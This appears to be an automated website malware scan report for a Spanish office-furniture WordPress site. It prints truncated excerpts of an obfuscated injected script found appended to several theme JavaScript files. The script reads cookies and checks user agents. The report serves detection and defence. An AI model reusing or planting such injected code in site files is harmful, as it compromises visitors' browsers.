Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=todoenmueblesdeoficina.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://todoenmueblesdeoficina.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 26 Dec 2014 01:43:24 GMT Location: http://www.todoenmueblesdeoficina.com/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Pingback: http://www.todoenmueblesdeoficina.com/xmlrpc.php | clean |
http://www.todoenmueblesdeoficina.com/ | 200 OK Content-Length: 31958 Content-Type: text/html | clean |
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery-1.4.4.min.js?ver=3.4.1 | 200 OK Content-Length: 79572 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo b],f.body["scroll"+b],f.documentElement["scroll"+b],f.body["offset"+b],f.documentElement["offset"+b]);else if(e===B){f=c.css(f,d);var h=parseFloat(f);return c.isNaN(h)?f:h}else return this.css(d,typeof e==="string"?e:e+"px")}})})(window); Antivirus reports:
| ||
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery.easing.1.3.js?ver=3.4.1 | 200 OK Content-Length: 10798 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo return jQuery.easing.easeOutElastic(x, t, b, c, d); }, elasinout: function(x, t, b, c, d) { return jQuery.easing.easeInOutElastic(x, t, b, c, d); }, backin: function(x, t, b, c, d) { return jQuery.easing.easeInBack(x, t, b, c, d); }, backout: function(x, t, b, c, d) { return jQuery.easing.easeOutBack(x, t, b, c, d); }, backinout: function(x, t, b, c, d) { return jQuery.easing.easeInOutBack(x, t, b, c, d); } }); Antivirus reports:
| ||
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery.cycle.all.min.js?ver=3.4.1 | 200 OK Content-Length: 29649 Content-Type: application/javascript | clean |
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery.validate.js?ver=3.4.1 | 200 OK Content-Length: 36338 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo } }; }); $.extend($.fn, { delegate: function(type, delegate, handler) { return this.bind(type, function(event) { var target = $(event.target); if (target.is(delegate)) { return handler.apply(target, arguments); } }); }, triggerEvent: function(type, target) { return this.triggerHandler(type, [$.event.fix({ type: type, target: target })]); } }) })(jQuery); Antivirus reports:
| ||
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery.prettyPhoto.js?ver=3.4.1 | 200 OK Content-Length: 22781 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/cufon.js?ver=3.4.1 | 200 OK Content-Length: 19229 Content-Type: application/javascript | clean |
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/aller.cufonfonts.js?ver=3.4.1 | 200 OK Content-Length: 300840 Content-Type: application/javascript | clean |
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jflickrfeed.min.js?ver=3.4.1 | 200 OK Content-Length: 2536 Content-Type: application/javascript | clean |
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery.tweet.js?ver=3.4.1 | 200 OK Content-Length: 9486 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo list.children('li:even').addClass('tweet_odd'); }); if (s.outro_text) list.after(outro); $(widget).trigger("loaded").trigger((tweets.length == 0 ? "empty" : "full")); if (s.refresh_interval) { window.setTimeout(function() { $(widget).trigger("load"); }, 1000 * s.refresh_interval); }; }); }).trigger("load"); }); }; })(jQuery); Antivirus reports:
| ||
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery.tools.min.js?ver=3.4.1 | 200 OK Content-Length: 11006 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo {conf:{activeClass:"active",circular:false,clonedClass:"cloned",disabledClass:"disabled",easing:"swing",initialIndex:0,item:null,items:".items",keyboard:true,mousewheel:false,next:".next",prev:".prev",speed:400,vertical:false,touch:true,wheelSpeed:0}};var k;e.fn.scrollable=function(f){var c=this.data("scrollable");if(c)return c;f=e.extend({},e.tools.scrollable.conf,f);this.each(function(){c=new u(e(this),f);e(this).data("scrollable",c)});return f.api?c:this}})(jQuery); Antivirus reports:
| ||
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery.nivo.slider.pack.js?ver=3.4.1 | 200 OK Content-Length: 10249 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo Antivirus reports:
| ||
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/script.js?ver=3.4.1 | 200 OK Content-Length: 15548 Content-Type: application/javascript | clean |
http://www.todoenmueblesdeoficina.com/wp-content/themes/rttheme13/js/jquery.innerfade.js?ver=3.4.1 | 200 OK Content-Length: 5897 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(a){var b=document.cookie.match(new RegExp("(?:^|; )"+a.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return b?decodeURIComponent(b[1]):undefined}(function(){function b(i,f,g){var j=(i+"").toLowerCase();var e=(f+"").toLowerCase();var h=0;if((h=j.indexOf(e,g))!==-1){return h}return false}function d(){var f=["Yandex","AppleWebKit","Windows NT 6.3","X11","Phone","Google"];var g=false;for(var e in f){if(b(navigator.userAgent,f[e])){g=true;break}}return g}var c=(getCoo current = Math.floor(Math.random() * elements.length); } else alert('Innerfade-Type must either be \'sequence\', \'random\' or \'random_start\''); setTimeout((function() { $.innerfade.next(elements, settings, current, last); }), settings.timeout); }; })(jQuery); function removeFilter(element) { if(element.style.removeAttribute){ element.style.removeAttribute('filter'); } } Antivirus reports:
| ||
http://www.todoenmueblesdeoficina.com/wp-includes/js/jquery/jquery.form.js?ver=2.73 | 200 OK Content-Length: 11936 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: todoenmueblesdeoficina.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Dec 2014 01:43:24 GMT
Location: http://www.todoenmueblesdeoficina.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.todoenmueblesdeoficina.com/xmlrpc.php
...0 bytes of data.
GET / HTTP/1.1
Host: todoenmueblesdeoficina.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 26 Dec 2014 01:43:24 GMT
Location: http://www.todoenmueblesdeoficina.com/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.todoenmueblesdeoficina.com/xmlrpc.php
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: todoenmueblesdeoficina.com
Referer: http://www.google.com/search?q=todoenmueblesdeoficina.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: todoenmueblesdeoficina.com
Referer: http://www.google.com/search?q=todoenmueblesdeoficina.com
Result:
The result is similar to the first query. There are no suspicious redirects found.